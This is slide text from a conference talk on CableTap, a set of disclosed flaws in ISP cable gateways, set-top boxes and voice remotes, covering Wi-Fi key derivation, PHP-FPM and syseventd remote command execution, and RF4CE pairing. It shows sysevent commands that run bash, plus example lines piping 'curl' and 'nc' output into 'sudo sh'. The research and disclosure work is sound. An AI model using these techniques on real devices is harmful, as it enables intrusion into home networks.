Cabletap

Wirelessly Tapping your home

network

MARC NEWLIN LOGAN LAMB CHRIS GRAYSON

@MARCNEWLIN LOGAN@BASTILLE.IO @_LAVALAMP
WELCOME TO THE
LINECON AFTER-PARTY.
 MARC NEWLIN
(@marcnewlin)
WIRELESS SECURITY RESEARCHER @ BASTILLE NETWORKS
 CHRISTOPHER GRAYSON
(@_lavalamp)
FOUNDER/PRINCIPAL ENGINEER @ WEB SIGHT
 LOGAN LAMB
(logan@bastille.io)
RESEARCHER @ BASTILLE NETWORKS
What is
CableTap?

• 26 CVEs
• ISP-provided wireless gateways, set-top boxes, and voice remotes
• Cisco, Arris, Technicolor, Motorola, Xfinity (voice remote)
• Multiple unauthenticated RCE attack chains
• Network / application vulnerabilities
• Wi-Fi vulnerabilities
• ZigBee RF4CE vulnerabilities
Why does
CableTap matter?

• Full compromise of affected devices

• Wide impact
• ISP vulnerabilities
• Vendor vulnerabilities
• RDK vulnerabilities (software stack used by many major ISPs)
• Attack chains affecting Comcast XFINITY devices have been patched
 1. Background on RDK

2. RDK-based devices

3. Progression of research
AGENDA
4. Vulnerabilities

5. Disclosure process

6. Q&A
Background
on RDK.
REFERENCE DEVELOPMENT KIT (RDK)
• “a standardized software stack with
localization plugins created to
accelerate the deployment of next-gen
video products and services by
multichannel video providers
(MVPDs).”

• Founded in 2012

https://rdkcentral.com/ • Standardized software stack for

modems, set top boxes, media devices

C
YAY OPEN SOURCE (?) SOFTWARE!
An open-source, community-driven
project available at:
https://code.rdkcentral.com/

But wait what’s this WHOIS record?

Ohhhh that sinking feeling in the pit
of my stomach…
 • There’s the open source version,
YEAH BUT WHO then there’s the versions
deployed on deployed devices
NEEDS PATCHES • Lots of vulns patched in the open
ANYHOO source repo

• Patches take months to deploy,

no CVEs filed for, no disclosure to
affected customers

• Still faster to deploy patches with

RDK than non-standardized
“native” stacks

• RCE, XSS, XSRF, you name it they

got it
RDK-Based
Devices

L
RDK DEVICES
● RDK-V (Video)

○ set-top boxes

● RDK-B (Broadband)

○ gateways
GENERAL RDK FEATURES

Remote Management Subsystem

Diagnostics

Security Subsystem

Media Framework
• Embedded Linux

• Lots of IO
• AV/Ethernet/Coax/USB/eSata

• Media Framework uses Webkit

• Supports keyboard and mouse

• More pictures: https://fccid.io/ACQ-

XG1
RDK-BROADBAND (GATEWAY)

Modem Router
(Network (Application Gateway
Processor) Processor)
RDK-BROADBAND
• Two systems on one board Annotated dpc3939 internals here

• Inter-processor communication over a switch

• Intel Puma

• Network Processor - ARM core

• Application Processor - Intel Atom

• Generally has two serial ports active

RDK-B ENGINEER STANDPOINT

L
Progression of Research

M
MARC LEARNS TO NETCAT
Project inspiration (Peter Geissler’s talk @ HITB)

Connecting with Chris

Prior Comcast customer (Marc’s ISP)
“Beyond your cable modem” 32C3 talk

“How do I webapp security plz?”

Pulling off the filesystem using the previously disclosed web UI ping vuln

Digging into the RDK repos

M
GETTING SERIOUS
Finding some vulns and getting serious

Bringing the side project to Bastille

Bringing Logan into the fold

Hardware and embedded hacking expertise

Expanding to set-top boxes

Disclosing to vendors as new vulnerabilities are found

M
Vulnerabilities

M
VULNS - HIDDEN HOME SECURITY WIFI
Home security service offered by many ISPs

Touchscreen control panel connects over WiFi

Hidden WiFi network runs on the customer’s gateway
SSID and passphrase generated based on the CM MAC

Hidden WiFi network, previously documented online

Web UI access point index “hack”
XHS-XXXXXXXX SSID format, based on CM MAC

Grepping around for “calculate” “generate” “key” “psk” etc

M
VULNS - HIDDEN HOME SECURITY WIFI
CalculatePSKKey in <some binary>

Cross compiling for big-endian ARM and running a keygen binary on the gateway

Guesswork yielding the CM MAC input and PSK key output

Command line binary observed on some devices

How to get the CM MAC??

M
VULNS - DHCP ACK CM MAC LEAK
1. Connect to “xfinitywifi” network
2. CM MAC of the wireless gateway is included in the DHCP ACK
3. Generate hidden home security network SSID and passphrase

M
VULNS - IPV6 MULTICAST CM MAC LEAK
1. Sniff the 802.11 channel used by the
target wireless gateway

2. Every ~4 seconds, a 156-byte IPv6

multicast packet is transmitted with the
l2sd0.500 interface MAC address

3. Translate the l2sd0.500 MAC to the CM

MAC 11:22:33:44:55:66 - l2sd0.500
4. Generate hidden home security network
0F:22:33:44:55:63 - CM MAC
SSID and passphrase

M
VULNS - eMTA FQDN CM MAC LEAK

1. mta0 (VoIP) interface has FQDN:

FQDN containing the mta0 m001122334455.atlt6.ga.comcast.net
MAC
2. Translate the mta0 MAC into CM MAC:
00:11:22:33:44:53 <-- last octet decreased
the CM MAC
by 2
3. Generate hidden home security
network SSID and passphrase
VULNS - IPV6 ADDRESSING FROM CM MACS

Global IPv6 Given the following inputs:

Link-local IPv6 Region identifier: 40:11 (Atlanta)

Unknown octet: 53 (can be brute forced)
MAC address: 11:22:33:44:55:66

The following wan0 IPv6 address is generated:

2001:0558:4011:0053:1122:33FF:FE44:5566

M
COMCAST VS PUBLIC INTERNET DEVICE ACCESS

Web UI supports MSO login from WAN only

SSH service from WAN only

Internet-facing network configuration appears well locked-down

M
XFINITY SEND-TO-TV
Xifinity customer signs in with their
account credentials
Web app accepts URL
Set-top box displays URL in a web browser

M
VULNS - XFINITY SEND-TO-TV / REMOTE WEB UI
Gateway web UI accepts remote
requests from Comcast
infrastructure
MSO login using the POTD

Alternative hard-coded credentials

IPv6 address of target gateway

provides remote web UI access via
set-top box
Vulns - POTD

“Password of the day” can be generated on a wireless gateway

Used for remote web UI authentication

Used for remote SSH authentication

M
VULNS - FREE INTERNET
• Public wifi access points run by • MAC address is remembered
ISPs for future access
• e.g. “CableWiFi”, “xfinitywifi”, etc • Attacker can spoof the MAC
• AP’s are on customer equipment • Free Internet on other public access
points
or ISP equipment
• “xfinitywifi” usage does not count
• Customer logs into their ISP
toward a customer’s
account to get access

M
SEND-TO-TV ATTACK
DEMO

M
IT’S LIKE CGI, BUT FAST & W/ EXPLOITS
• FastCGI – successor to the Common Gateway Interface (CGI) protocol

• Authored in 1996

• Enables web servers to invoke other processes – birth of dynamic generation of web
content

• No RFC, only documentation from MIT .edu site

• Responder, Authorizer, and Filter modes of operation

C
 PHP FASTCGI PROCESS MANAGER (PHP-FPM)
• PHP + FastCGI – what could
possibly go wrong?!
• Lets you reconfigure PHP settings
on every request
• HTTP POST data supplied via
STDIN FastCGI parameter
• If only there were abusable PHP
configuration values…
 PIECING THINGS
• We can…
• Reconfigure the PHP interpreter to TOGETHER
include an arbitrary file
• Supply data to STDIN via HTTP
POST

• But how do we include STDIN?

• PHP TO THE RESCUE!
• php://stdin
ISN’T THIS OLD NEWS?
• Yes… Kind of (CVE-2012-1823)

• Previous work was on exploiting the PHP-CGI

37,449
binary residing within a web directory

• But what if the PHP-CGI binary is bound to a

network port? PHPFPM servers on port 1026 (IPv4 address space)

• Nmap sees as tcpwrapped (TCP 1026-1029)

• Scripts for detection included in CableTap

code repo

C
A TWIST IN RDK’S PHPFPM

• PHPFPM on the RDK deployments we

tested had the PHP configuration
component stripped out

• No publicly-available documentation
as to how to do this – why was it
removed?

• Could still gain code execution by

referencing PHP files on the system
and bypassing control flow guards in
the default web app

C
SYSEVENTD – RCE AS A SERVICE (RAAS)
• Binary protocol listener on TCP
52,367 (all interfaces)

• Not the same as Oracle

syseventd!

• Intended for firing off commands

based on system events
(logging??)

• No auth, no nothing!

C
SYSEVENTD USAGE

1. Create an event with a name and a binary to call upon event occurrence (name must be a file path)

$ sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp

1. Trigger the event by touching the event name file path and providing an argument

$ sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file>

1. Binary is called with event name and arguments passed to command via execv

$ /bin/cp </path/to/file> /var/IGD/</file>

C
SYSEVENTD (AB)USAGE

• Create an event with a

/bin/cp /foo/bbhm_cur_cfg.xml /bar/baz/bbhm_cur_cfg.xml target process of /bin/bash
and an event name of -c

• Trigger the event with a

value of the bash command
to run

• ???
/bin/bash –c “<commands to execute>”
• Profit

C
WHERE THE SYSEVENTD AT?!

• Bound to all interfaces

• Sometimes not firewalled off from
public-facing IP address 149,162
• Otherwise exposed to plenty of the Syseventd services on TCP 52,367 (IPv4 address space)
LAN IPs

C
A TALE OF TWO OPERATING SYSTEMS

• Two operating systems on the board

• One ARM (modem w/ web app) and

one Atom (router)

• Modem is at bottom of range

(10.0.0.1) and Atom is at top of range
(10.0.0.254)

C
I MAKE MY OWN ROUTES DAMMIT
• Atom OS has an interface allocated in
169.254.0.0/16 range for Dbus ip route add 169.254.0.1 via 10.0.0.254

• …You can route to it if you’re into that

sort of thing
• Custom RPC service that is quite
literally RCE as service, and all that
FastCGI goodness
• Once on Atom side, hardcoded root
SSH creds to ARM side on
192.168.0.0/16

C
SET-TOP BOX VULNS

Remote web inspector

Arbitrary file read

Root command execution

RF4CE remote force pairing

RF4CE remote force OTA

L
REMOTE WEB INSPECTOR
Comparable to FireFox and Chrome DevTools, accessible from over the internet

L
ARBITRARY FILE READ

● Found a route that looked like

it was for reading files from the
filesystem

● The route is for reading files

from the filesystem

L
 ROOT COMMAND EXECUTION
sudo make install

Sanitize your inputs!!! curl http://totallylegit.com | sudo sh

Sanitize your inputs!!!
Sanitize your inputs!!!
nc -l -p 8080 0.0.0.0 | sudo sh

<?php
$name = $_POST["name"];
shell_exec("echo hello $name");
?>
VOICE REMOTE OVERVIEW

Control your STB with your voice!

Wireless instead of IR!

Motion activated lights!

TI CC2530 with RF4CE stack

RF4CE OVERVIEW

Zigbee protocol for remote control

Key exchange is unencrypted

RF4CE MSO (OPENCABLE) OVERVIEW
Uses RF4CE

For remote control of cable equipment

Binding process is not rate limited

RF4CE REMOTE FORCED PAIRING

Emulate remote

Entire binding process in under one second

~2 hours to force pair remote

L
RF4CE REMOTE FORCED OTA

Firmware package ISN’T signed

1) Modify update daemon

2) Modify firmware payload

3) Fix CRC and version

4) OTA :)

L
Devices
& Disclosure

M
KNOWN AFFECTED DEVICES
Vendor Model Type Tested ISP CVE Count

Cisco DPC3939 Wireless Gateway Xfinity 16

Cisco DPC3939B Wireless Gateway Comcast Business 13

Technicolor DPC3941T Wireless Gateway Xfinity 11

Arris TG1682G Wireless Gateway Xfinity 12

Technicolor TC8717T* Wireless Gateway Time Warner 1

Motorola MX011ANM Set-Top Box Xfinity 6

Xfinity XR11-20 ZigBee Voice Remote Xfinity 1

M
KNOWN NON-RDK DEVICES
Vendor Model Type Tested ISP

Arris TG1682G Wireless Gateway Spectrum

Technicolor TC8717T Wireless Gateway Mediacom

Technicolor TC8717T Wireless Gateway Time Warner

Arris TG2492LG-VM Wireless Gateway (Super Hub 3.0) Virgin Media

Compal CH7465LG-LC Wireless Gateway (Connect Box) Unitymedia

Technicolor TC8305C Wireless Gateway Xfinity

M
DISCLOSURE TIMELINE
03/27/2017 Group 1 Vendor Disclosures

03/28/2017 Group 2 Vendor Disclosures

04/20/2017 Group 3 Vendor Disclosures

04/28/2017 Group 4 Vendor Disclosures

07/11/2017 Abstract goes live on defcon.org

07/28/2018 Public Disclosure (all groups)

M
REMEDIATION AND MITIGATION

Unauthenticated RCE attack chains affecting Comcast XFINITY devices have been
remediated

Customers of other ISPs should contact their ISP to determine if their hardware is
affected by CableTap

M
FINAL REMARKS

Not enough time to talk about all of the vulnerabilities

Please see our whitepaper for further details <link to whitepaper>

We found a substantial number of vulns, but the most severe have been patched
(hooray!)

M
Q&A
Thank you for watching our talk :)

Thanks to Bastille for supporting our research.

Thanks to Comcast for remediating the unauthenticated RCE attack

chains affecting Xfinity-branded devices.

MARC NEWLIN LOGAN LAMB CHRIS GRAYSON

Bastille Networks Bastille Networks Web Sight
marc@bastille.io logan@bastille.io chris@websight.io
@marcnewlin @_lavalamp